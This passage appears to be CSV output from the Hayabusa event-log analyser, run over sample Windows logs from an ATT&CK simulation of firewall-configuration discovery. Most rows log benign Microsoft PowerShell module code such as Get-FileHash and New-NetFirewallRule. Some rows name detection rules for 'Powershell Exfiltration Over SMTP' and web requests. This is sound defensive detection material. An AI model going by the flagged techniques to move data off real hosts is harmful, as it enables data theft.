""Import-Clixml"", ""ConvertTo-Xml"", ""Select-Xml"", ""Write-Debug"", ""Write-Verbose"", ""Write-Warning"", ""Write-Error"", ""Write-Output"", ""Set-PSBreakpoint"", ""Get-PSBreakpoint"", ""Remove-PSBreakpoint"", ""Enable-PSBreakpoint"", ""Disable-PSBreakpoint"", ""Get-PSCallStack"", ""Send-MailMessage"", ""Get-TraceSource"", ""Set-TraceSource"", ""Trace-Command"", ""Show-Command"", ""Unblock-File"" NestedModules=""Microsoft.PowerShell.Commands.Utility.dll"",""Microsoft.PowerShell.Utility.psm1"" HelpInfoURI = 'http://go.microsoft.com/fwlink/?linkid=285758' }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.614 +00:00,FS03.offsec.lan,4104,medium,Exfil,Powershell Exfiltration Over SMTP,,rules/sigma/powershell/powershell_script/posh_ps_send_mailmessage.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.614 +00:00,FS03.offsec.lan,4104,medium,Exec,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.661 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-FileHash { [CmdletBinding(DefaultParameterSetName = ""Path"")] param( [Parameter(Mandatory, ParameterSetName=""Path"", Position = 0)] [System.String[]] $Path, [Parameter(Mandatory, ParameterSetName=""LiteralPath"", ValueFromPipelineByPropertyName = $true)] [Alias(""PSPath"")] [System.String[]] $LiteralPath, [Parameter(Mandatory, ParameterSetName=""Stream"")] [System.IO.Stream] $InputStream, [ValidateSet(""SHA1"", ""SHA256"", ""SHA384"", ""SHA512"", ""MACTripleDES"", ""MD5"", ""RIPEMD160"")] [System.String] $Algorithm=""SHA256"" ) begin { # Construct the strongly-typed crypto object $hasher = [System.Security.Cryptography.HashAlgorithm]::Create($Algorithm) } process { if($PSCmdlet.ParameterSetName -eq ""Stream"") { GetStreamHash -InputStream $InputStream -RelatedPath $null -Hasher $hasher } else { $pathsToProcess = @() if($PSCmdlet.ParameterSetName -eq ""LiteralPath"") { $pathsToProcess += Resolve-Path -LiteralPath $LiteralPath | Foreach-Object ProviderPath } if($PSCmdlet.ParameterSetName -eq ""Path"") { $pathsToProcess += Resolve-Path $Path | Foreach-Object ProviderPath } foreach($filePath in $pathsToProcess) { if(Test-Path -LiteralPath $filePath -PathType Container) { continue } try { # Read the file specified in $FilePath as a Byte array [system.io.stream]$stream = [system.io.file]::OpenRead($filePath) GetStreamHash -InputStream $stream -RelatedPath $filePath -Hasher $hasher } catch [Exception] { $errorMessage = [Microsoft.PowerShell.Commands.UtilityResources]::FileReadError -f $FilePath, $_ Write-Error -Message $errorMessage -Category ReadError -ErrorId ""FileReadError"" -TargetObject $FilePath return } finally { if($stream) { $stream.Close() } } } } } } function GetStreamHash { param( [System.IO.Stream] $InputStream, [System.String] $RelatedPath, [System.Security.Cryptography.HashAlgorithm] $Hasher) # Compute file-hash using the crypto object [Byte[]] $computedHash = $Hasher.ComputeHash($InputStream) [string] $hash = [BitConverter]::ToString($computedHash) -replace '-','' if ($RelatedPath -eq $null) { $retVal = [PSCustomObject] @{ Algorithm = $Algorithm.ToUpperInvariant() Hash = $hash } $retVal.psobject.TypeNames.Insert(0, ""Microsoft.Powershell.Utility.FileHash"") $retVal } else { $retVal = [PSCustomObject] @{ Algorithm = $Algorithm.ToUpperInvariant() Hash = $hash Path = $RelatedPath } $retVal.psobject.TypeNames.Insert(0, ""Microsoft.Powershell.Utility.FileHash"") $retVal } } # SIG # Begin signature block # MIIavwYJKoZIhvcNAQcCoIIasDCCGqwCAQExCzAJBgUrDgMCGgUAMGkGCisGAQQB # gjcCAQSgWzBZMDQGCisGAQQBgjcCAR4wJgIDAQAABBAfzDtgWUsITrck0sYpfvNR # AgEAAgEAAgEAAgEAAgEAMCEwCQYFKw4DAhoFAAQU4uPI6oMmN45jE4gtibs9Byjz # 1dCgghWCMIIEwzCCA6ugAwIBAgITMwAAADUo7mFTkiJhkQAAAAAANTANBgkqhkiG # 9w0BAQUFADB3MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4G # A1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSEw # HwYDVQQDExhNaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EwHhcNMTMwMzI3MjAwODI2 # WhcNMTQwNjI3MjAwODI2WjCBszELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hp # bmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jw # b3JhdGlvbjENMAsGA1UECxMETU9QUjEnMCUGA1UECxMebkNpcGhlciBEU0UgRVNO # OjMxQzUtMzBCQS03QzkxMSUwIwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBT # ZXJ2aWNlMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAm9vWEfGEH1m0 # kUedzTgvsolxQaJbPc6WtX2a9wqAK0ICg8R8//f26pcftWw4XkuVVOjsk9K5TeT3 # KyaHr7vrG+hNHCFDF/igM5qRsYFNOIEkUwKxdnlaLqz7y4xcXTubXKU7NoBsI3S2 # xnffQyfNOpmouBP65aqjt8VzhFbsjsFIMwGJMa8nNq07LQDicQQxvva3dLFnP1rl # hLUBJpB4iYAlPj5CHFJKZCcCaM6iBr7QtT5EF4CZiImcwLkP1fI5lcM1FLsJEEW5 # 6m5frIDLh3xFZAImCU+adqVmvhBJKKO57P+y+mFb+WPqknL1SurKOz0TkYw7/TnW # STwC7nod4QIDAQABo4IBCTCCAQUwHQYDVR0OBBYEFLkUVdsQ7WBr1Q2DdA3Oc3OV # ImUcMB8GA1UdIwQYMBaAFCM0+NlSRnAK7UD7dvuzK7DDNbMPMFQGA1UdHwRNMEsw # SaBHoEWGQ2h0dHA6Ly9jcmwubWljcm9zb2Z0LmNvbS9wa2kvY3JsL3Byb2R1Y3Rz # L01pY3Jvc29mdFRpbWVTdGFtcFBDQS5jcmwwWAYIKwYBBQUHAQEETDBKMEgGCCsG # AQUFBzAChjxodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpL2NlcnRzL01pY3Jv # c29mdFRpbWVTdGFtcFBDQS5jcnQwEwYDVR0lBAwwCgYIKwYBBQUHAwgwDQYJKoZI # hvcNAQEFBQADggEBAJaVlxhREadlaCDXqFbP6lUQVKjx5/JsbwouUz8YgQjPN/Y1 # ymKKoJBe4u9HzqrHBZj93hq26BKkmrnKpWKvyOY+ODJcA9PzaPlgnMeyJdykTGuP # BsvYtsFYIn6E1Wu56PE+L3n28vpsaOjKAl8BvrGgbPmPRbm4SwZfxJSO9+3r1yFa # uFZbeGfcQAl82pKj27zQmh2O5snaz1Iff7+W3owsX20ilqNJ+acaIl7/6cpyJUC4 # 87hUHlrIV1CyiyLmEOyt7aUQlFLU7VtXgskXVPZ03lGrVDTglUY63lUwGhdwL5f2 # CgYipvqCjochior3gYxSN0w6jQRbNcvzG4N1vl0wggTsMIID1KADAgECAhMzAAAA # sBGvCovQO5/dAAEAAACwMA0GCSqGSIb3DQEBBQUAMHkxCzAJBgNVBAYTAlVTMRMw # EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN # aWNyb3NvZnQgQ29ycG9yYXRpb24xIzAhBgNVBAMTGk1pY3Jvc29mdCBDb2RlIFNp # Z25pbmcgUENBMB4XDTEzMDEyNDIyMzMzOVoXDTE0MDQyNDIyMzMzOVowgYMxCzAJ # BgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25k # MR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xDTALBgNVBAsTBE1PUFIx # HjAcBgNVBAMTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjCCASIwDQYJKoZIhvcNAQEB # BQADggEPADCCAQoCggEBAOivXKIgDfgofLwFe3+t7ut2rChTPzrbQH2zjjPmVz+l # URU0VKXPtIupP6g34S1Q7TUWTu9NetsTdoiwLPBZXKnr4dcpdeQbhSeb8/gtnkE2 # KwtA+747urlcdZMWUkvKM8U3sPPrfqj1QRVcCGUdITfwLLoiCxCxEJ13IoWEfE+5 # G5Cw9aP+i/QMmk6g9ckKIeKq4wE2R/0vgmqBA/WpNdyUV537S9QOgts4jxL+49Z6 # dIhk4WLEJS4qrp0YHw4etsKvJLQOULzeHJNcSaZ5tbbbzvlweygBhLgqKc+/qQUF # 4eAPcU39rVwjgynrx8VKyOgnhNN+xkMLlQAFsU9lccUCAwEAAaOCAWAwggFcMBMG # A1UdJQQMMAoGCCsGAQUFBwMDMB0GA1UdDgQWBBRZcaZaM03amAeA/4Qevof5cjJB # 8jBRBgNVHREESjBIpEYwRDENMAsGA1UECxMETU9QUjEzMDEGA1UEBRMqMzE1OTUr # NGZhZjBiNzEtYWQzNy00YWEzLWE2NzEtNzZiYzA1MjM0NGFkMB8GA1UdIwQYMBaA # FMsR6MrStBZYAck3LjMWFrlMmgofMFYGA1UdHwRPME0wS6BJoEeGRWh0dHA6Ly9j # cmwubWljcm9zb2Z0LmNvbS9wa2kvY3JsL3Byb2R1Y3RzL01pY0NvZFNpZ1BDQV8w # OC0zMS0yMDEwLmNybDBaBggrBgEFBQcBAQROMEwwSgYIKwYBBQUHMAKGPmh0dHA6 # Ly93d3cubWljcm9zb2Z0LmNvbS9wa2kvY2VydHMvTWljQ29kU2lnUENBXzA4LTMx # LTIwMTAuY3J0MA0GCSqGSIb3DQEBBQUAA4IBAQAx124qElczgdWdxuv5OtRETQie # 7l7falu3ec8CnLx2aJ6QoZwLw3+ijPFNupU5+w3g4Zv0XSQPG42IFTp8263Os8ls # ujksRX0kEVQmMA0N/0fqAwfl5GZdLHudHakQ+hywdPJPaWueqSSE2u2WoN9zpO9q # GqxLYp7xfMAUf0jNTbJE+fA8k21C2Oh85hegm2hoCSj5ApfvEQO6Z1Ktwemzc6bS # Y81K4j7k8079/6HguwITO10g3lU/o66QQDE4dSheBKlGbeb1enlAvR/N6EXVruJd # PvV1x+ZmY2DM1ZqEh40kMPfvNNBjHbFCZ0oOS786Du+2lTqnOOQlkgimiGaCMIIF # vDCCA6SgAwIBAgIKYTMmGgAAAAAAMTANBgkqhkiG9w0BAQUFADBfMRMwEQYKCZIm # iZPyLGQBGRYDY29tMRkwFwYKCZImiZPyLGQBGRYJbWljcm9zb2Z0MS0wKwYDVQQD # EyRNaWNyb3NvZnQgUm9vdCBDZXJ0aWZpY2F0ZSBBdXRob3JpdHkwHhcNMTAwODMx # MjIxOTMyWhcNMjAwODMxMjIyOTMyWjB5MQswCQYDVQQGEwJVUzETMBEGA1UECBMK # V2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0 # IENvcnBvcmF0aW9uMSMwIQYDVQQDExpNaWNyb3NvZnQgQ29kZSBTaWduaW5nIFBD # QTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBALJyWVwZMGS/HZpgICBC # mXZTbD4b1m/My/Hqa/6XFhDg3zp0gxq3L6Ay7P/ewkJOI9VyANs1VwqJyq4gSfTw # aKxNS42lvXlLcZtHB9r9Jd+ddYjPqnNEf9eB2/O98jakyVxF3K+tPeAoaJcap6Vy # c1bxF5Tk/TWUcqDWdl8ed0WDhTgW0HNbBbpnUo2lsmkv2hkL/pJ0KeJ2L1TdFDBZ # +NKNYv3LyV9GMVC5JxPkQDDPcikQKCLHN049oDI9kM2hOAaFXE5WgigqBTK3S9dP # Y+fSLWLxRT3nrAgA9kahntFbjCZT6HqqSvJGzzc8OJ60d1ylF56NyxGPVjzBrAlf # A9MCAwEAAaOCAV4wggFaMA8GA1UdEwEB/wQFMAMBAf8wHQYDVR0OBBYEFMsR6MrS # tBZYAck3LjMWFrlMmgofMAsGA1UdDwQEAwIBhjASBgkrBgEEAYI3FQEEBQIDAQAB # MCMGCSsGAQQBgjcVAgQWBBT90TFO0yaKleGYYDuoMW+mPLzYLTAZBgkrBgEEAYI3 # FAIEDB4KAFMAdQBiAEMAQTAfBgNVHSMEGDAWgBQOrIJgQFYnl+UlE/wq4QpTlVnk # pDBQBgNVHR8ESTBHMEWgQ6BBhj9odHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtp # L2NybC9wcm9kdWN0cy9taWNyb3NvZnRyb290Y2VydC5jcmwwVAYIKwYBBQUHAQEE # SDBGMEQGCCsGAQUFBzAChjhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpL2Nl # cnRzL01pY3Jvc29mdFJvb3RDZXJ0LmNydDANBgkqhkiG9w0BAQUFAAOCAgEAWTk+ # fyZGr+tvQLEytWrrDi9uqEn361917Uw7LddDrQv+y+ktMaMjzHxQmIAhXaw9L0y6 # oqhWnONwu7i0+Hm1SXL3PupBf8rhDBdpy6WcIC36C1DEVs0t40rSvHDnqA2iA6VW # 4LiKS1fylUKc8fPv7uOGHzQ8uFaa8FMjhSqkghyT4pQHHfLiTviMocroE6WRTsgb # 0o9ylSpxbZsa+BzwU9ZnzCL/XB3Nooy9J7J5Y1ZEolHN+emjWFbdmwJFRC9f9Nqu # 1IIybvyklRPk62nnqaIsvsgrEA5ljpnb9aL6EiYJZTiU8XofSrvR4Vbo0HiWGFzJ # NRZf3ZMdSY4tvq00RBzuEBUaAF3dNVshzpjHCe6FDoxPbQ4TTj18KUicctHzbMrB # 7HCjV5JXfZSNoBtIA1r3z6NnCnSlNu0tLxfI5nI3EvRvsTxngvlSso0zFmUeDord # EN5k9G/ORtTTF+l5xAS00/ss3x+KnqwK+xMnQK3k+eGpf0a7B2BHZWBATrBC7E7t # s3Z52Ao0CW0cgDEf4g5U3eWh++VHEK1kmP9QFi58vwUheuKVQSdpw5OPlcmN2Jsh # rg1cnPCiroZogwxqLbt2awAdlq3yFnv2FoMkuYjPaqhHMS+a3ONxPdcAfmJH0c6I # ybgY+g5yjcGjPa8CQGr/aZuW4hCoELQ3UAjWwz0wggYHMIID76ADAgECAgphFmg0 # AAAAAAAcMA0GCSqGSIb3DQEBBQUAMF8xEzARBgoJkiaJk/IsZAEZFgNjb20xGTAX # BgoJkiaJk/IsZAEZFgltaWNyb3NvZnQxLTArBgNVBAMTJE1pY3Jvc29mdCBSb290 # IENlcnRpZmljYXRlIEF1dGhvcml0eTAeFw0wNzA0MDMxMjUzMDlaFw0yMTA0MDMx # MzAzMDlaMHcxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYD # VQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xITAf # BgNVBAMTGE1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQTCCASIwDQYJKoZIhvcNAQEB # BQADggEPADCCAQoCggEBAJ+hbLHf20iSKnxrLhnhveLjxZlRI1Ctzt0YTiQP7tGn # 0UytdDAgEesH1VSVFUmUG0KSrphcMCbaAGvoe73siQcP9w4EmPCJzB/LMySHnfL0 # Zxws/HvniB3q506jocEjU8qN+kXPCdBer9CwQgSi+aZsk2fXKNxGU7CG0OUoRi4n # rIZPVVIM5AMs+2qQkDBuh/NZMJ36ftaXs+ghl3740hPzCLdTbVK0RZCfSABKR2YR # JylmqJfk0waBSqL5hKcRRxQJgp+E7VV4/gGaHVAIhQAQMEbtt94jRrvELVSfrx54 # QTF3zJvfO4OToWECtR0Nsfz3m7IBziJLVP/5BcPCIAsCAwEAAaOCAaswggGnMA8G # A1UdEwEB/wQFMAMBAf8wHQYDVR0OBBYEFCM0+NlSRnAK7UD7dvuzK7DDNbMPMAsG # A1UdDwQEAwIBhjAQBgkrBgEEAYI3FQEEAwIBADCBmAYDVR0jBIGQMIGNgBQOrIJg # QFYnl+UlE/wq4QpTlVnkpKFjpGEwXzETMBEGCgmSJomT8ixkARkWA2NvbTEZMBcG # CgmSJomT8ixkARkWCW1pY3Jvc29mdDEtMCsGA1UEAxMkTWljcm9zb2Z0IFJvb3Qg # Q2VydGlmaWNhdGUgQXV0aG9yaXR5ghB5rRahSqClrUxzWPQHEy5lMFAGA1UdHwRJ # MEcwRaBDoEGGP2h0dHA6Ly9jcmwubWljcm9zb2Z0LmNvbS9wa2kvY3JsL3Byb2R1 # Y3RzL21pY3Jvc29mdHJvb3RjZXJ0LmNybDBUBggrBgEFBQcBAQRIMEYwRAYIKwYB # BQUHMAKGOGh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2kvY2VydHMvTWljcm9z # b2Z0Um9vdENlcnQuY3J0MBMGA1UdJQQMMAoGCCsGAQUFBwMIMA0GCSqGSIb3DQEB # BQUAA4ICAQAQl4rDXANENt3ptK132855UU0BsS50cVttDBOrzr57j7gu1BKijG1i # uFcCy04gE1CZ3XpA4le7r1iaHOEdAYasu3jyi9DsOwHu4r6PCgXIjUji8FMV3U+r # kuTnjWrVgMHmlPIGL4UD6ZEqJCJw+/b85HiZLg33B+JwvBhOnY5rCnKVuKE5nGct # xVEO6mJcPxaYiyA/4gcaMvnMMUp2MT0rcgvI6nA9/4UKE9/CCmGO8Ne4F+tOi3/F # NSteo7/rvH0LQnvUU3Ih7jDKu3hlXFsBFwoUDtLaFJj1PLlmWLMtL+f5hYbMUVbo # nXCUbKw5TNT2eb+qGHpiKe+imyk0BncaYsk9Hm0fgvALxyy7z0Oz5fnsfbXjpKh0 # NbhOxXEjEiZ2CzxSjHFaRkMUvLOzsE1nyJ9C/4B5IYCeFTBm6EISXhrIniIh0EPp # K+m79EjMLNTYMoBMJipIJF9a6lbvpt6Znco6b72BJ3QGEe52Ib+bgsEnVLaxaj2J # oXZhtG6hE6a/qkfwEm/9ijJssv7fUciMI8lmvZ0dhxJkAj0tr1mPuOQh5bWwymO0 # eFQF1EEuUKyUsKV4q7OglnUa2ZKHE3UiLzKoCG6gW4wlv6DvhMoh1useT8ma7kng # 9wFlb4kLfchpyOZu6qeXzjEp/w7FW1zYTRuh2Povnj8uVRZryROj/TGCBKcwggSj # AgEBMIGQMHkxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYD # VQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xIzAh # BgNVBAMTGk1pY3Jvc29mdCBDb2RlIFNpZ25pbmcgUENBAhMzAAAAsBGvCovQO5/d # AAEAAACwMAkGBSsOAwIaBQCggcAwGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQw # HAYKKwYBBAGCNwIBCzEOMAwGCisGAQQBgjcCARUwIwYJKoZIhvcNAQkEMRYEFClk # UQl5qDpcmXxdpFeDJK8FifcsMGAGCisGAQQBgjcCAQwxUjBQoCaAJABXAGkAbgBk # AG8AdwBzACAAUABvAHcAZQByAFMAaABlAGwAbKEmgCRodHRwOi8vd3d3Lm1pY3Jv # c29mdC5jb20vcG93ZXJzaGVsbCAwDQYJKoZIhvcNAQEBBQAEggEALlxQato88b0W # GuCgTkjSdxozipikRZRALhDIbPeqH6HtmgJcwK723FNOko6J0Xrhnt1w+Ypx77X2 # 8yP9Hu2sG+Cm+vH4RcLCKR9zAUQGmURsoNhCcRebCKchavCcPqYzL8WmMToUVuEB # epnqGcNr8gMvhur6+Tw22bJewK48IdD96JBDVEoihHj8d0jwM19UFPuT+EmebCRv # 8ii/hESmbCZnwQclRzaoA3oJ+odsWN+XbE3fHhrGSfnE7yaiMKsyHKQ+RsV9c1x9 # /XgOkPj1o/cfKgQ0qeOamP7HmABCWv9jGBaQ/lpLASraT6gaTl9yEPvuKx1ozorh # G1o2H651lKGCAigwggIkBgkqhkiG9w0BCQYxggIVMIICEQIBATCBjjB3MQswCQYD # VQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEe # MBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSEwHwYDVQQDExhNaWNyb3Nv # ZnQgVGltZS1TdGFtcCBQQ0ECEzMAAAA1KO5hU5IiYZEAAAAAADUwCQYFKw4DAhoF # AKBdMBgGCSqGSIb3DQEJAzELBgkqhkiG9w0BBwEwHAYJKoZIhvcNAQkFMQ8XDTEz # MTIxODAwMjI1OFowIwYJKoZIhvcNAQkEMRYEFKH1XT6678OZm4aTERf5dKwwQZed # MA0GCSqGSIb3DQEBBQUABIIBAGgc0v8jALuDbFhj0n+eoe+T+K3O7SCk9SDcc8wC # 9MP+HYeyr7IvyMJY9Prn1v/JEkUNBczhWmFluGBzw1ASpTkP5hJRbdZFiQkbtqR1 # PZi8TWsbcoWjbqzwR3fgiwydRlkDu0zKO+P3pbuHFgO2ACb7ggLRllTgfWNJFZGg # iHFwS0JLQttb18AZTZyt7VteGhzOrcfRP97+bPpidJXfR1eMXbeoXuAROO0LdNP1 # 6QcsS/++dFMLo+s7ISTcdh9OTKg672kD7zo2+UKZ/MvJbsOikD7cFJppM2ZDCnvi # S5HhTmzKz47z2m+/DsWq7NMZ1pfJFojTeMw8niuUPNOZWRg= # SIG # End signature block",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.661 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-FileHash { [CmdletBinding(DefaultParameterSetName = ""Path"")] param( [Parameter(Mandatory, ParameterSetName=""Path"", Position = 0)] [System.String[]] $Path, [Parameter(Mandatory, ParameterSetName=""LiteralPath"", ValueFromPipelineByPropertyName = $true)] [Alias(""PSPath"")] [System.String[]] $LiteralPath, [Parameter(Mandatory, ParameterSetName=""Stream"")] [System.IO.Stream] $InputStream, [ValidateSet(""SHA1"", ""SHA256"", ""SHA384"", ""SHA512"", ""MACTripleDES"", ""MD5"", ""RIPEMD160"")] [System.String] $Algorithm=""SHA256"" ) begin { # Construct the strongly-typed crypto object $hasher = [System.Security.Cryptography.HashAlgorithm]::Create($Algorithm) } process { if($PSCmdlet.ParameterSetName -eq ""Stream"") { GetStreamHash -InputStream $InputStream -RelatedPath $null -Hasher $hasher } else { $pathsToProcess = @() if($PSCmdlet.ParameterSetName -eq ""LiteralPath"") { $pathsToProcess += Resolve-Path -LiteralPath $LiteralPath | Foreach-Object ProviderPath } if($PSCmdlet.ParameterSetName -eq ""Path"") { $pathsToProcess += Resolve-Path $Path | Foreach-Object ProviderPath } foreach($filePath in $pathsToProcess) { if(Test-Path -LiteralPath $filePath -PathType Container) { continue } try { # Read the file specified in $FilePath as a Byte array [system.io.stream]$stream = [system.io.file]::OpenRead($filePath) GetStreamHash -InputStream $stream -RelatedPath $filePath -Hasher $hasher } catch [Exception] { $errorMessage = [Microsoft.PowerShell.Commands.UtilityResources]::FileReadError -f $FilePath, $_ Write-Error -Message $errorMessage -Category ReadError -ErrorId ""FileReadError"" -TargetObject $FilePath return } finally { if($stream) { $stream.Close() } } } } } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.661 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function GetStreamHash { param( [System.IO.Stream] $InputStream, [System.String] $RelatedPath, [System.Security.Cryptography.HashAlgorithm] $Hasher) # Compute file-hash using the crypto object [Byte[]] $computedHash = $Hasher.ComputeHash($InputStream) [string] $hash = [BitConverter]::ToString($computedHash) -replace '-','' if ($RelatedPath -eq $null) { $retVal = [PSCustomObject] @{ Algorithm = $Algorithm.ToUpperInvariant() Hash = $hash } $retVal.psobject.TypeNames.Insert(0, ""Microsoft.Powershell.Utility.FileHash"") $retVal } else { $retVal = [PSCustomObject] @{ Algorithm = $Algorithm.ToUpperInvariant() Hash = $hash Path = $RelatedPath } $retVal.psobject.TypeNames.Insert(0, ""Microsoft.Powershell.Utility.FileHash"") $retVal } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.661 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.661 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function New-NetFirewallRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction] ${Direction}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${Action}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('LSM')] [bool] ${LooseSourceMapping}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${LocalOnlyMapping}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Owner}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Protocol}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${IcmpType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('DynamicTransport')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport] ${DynamicTarget}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Program}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Package}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Service}, [Parameter(ParameterSetName='cim:CreateInstance0')] [System.Management.Automation.WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${LocalUser}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteUser}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteMachine}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication] ${Authentication}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption] ${Encryption}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${OverrideBlockRules}, [Parameter(ParameterSetName='cim:CreateInstance0')] 